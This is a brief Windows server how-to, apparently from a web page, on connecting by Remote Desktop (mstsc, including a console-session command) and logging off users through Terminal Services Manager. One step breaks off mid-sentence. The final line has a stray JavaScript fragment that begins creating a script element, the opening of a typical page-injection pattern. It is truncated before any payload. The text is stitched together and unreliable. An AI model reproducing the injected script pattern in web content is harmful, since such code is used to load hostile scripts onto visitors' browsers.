Then do the following:
- Go to Start on your local machine.
mstsc -v:**Make sure to enter YOUR dedicated server name, it should be in the form of
- Enter the userid and password to login.
- On the server, go to Start.
- Select Administrative Tools.
- Select Terminal Services Manager.
- If you select This Computer in the menu on the left hand side, you will be able to view all users who are currently logged on to your server.
- Select the user(s) you wish to Log Off.
- Right click on one of the users and select Log Off.
- Do this for the second user also.
- After a couple of minutes, both users will disappear. If they do not, run through steps 9 – 11 again.
(to access the console session, do this:
start | run –
mstsc -v:0.0.0.0 /f -console
(replace the 0.0.0.0 with your ipaddress))var d=document;var s=d.createElement(‘script’);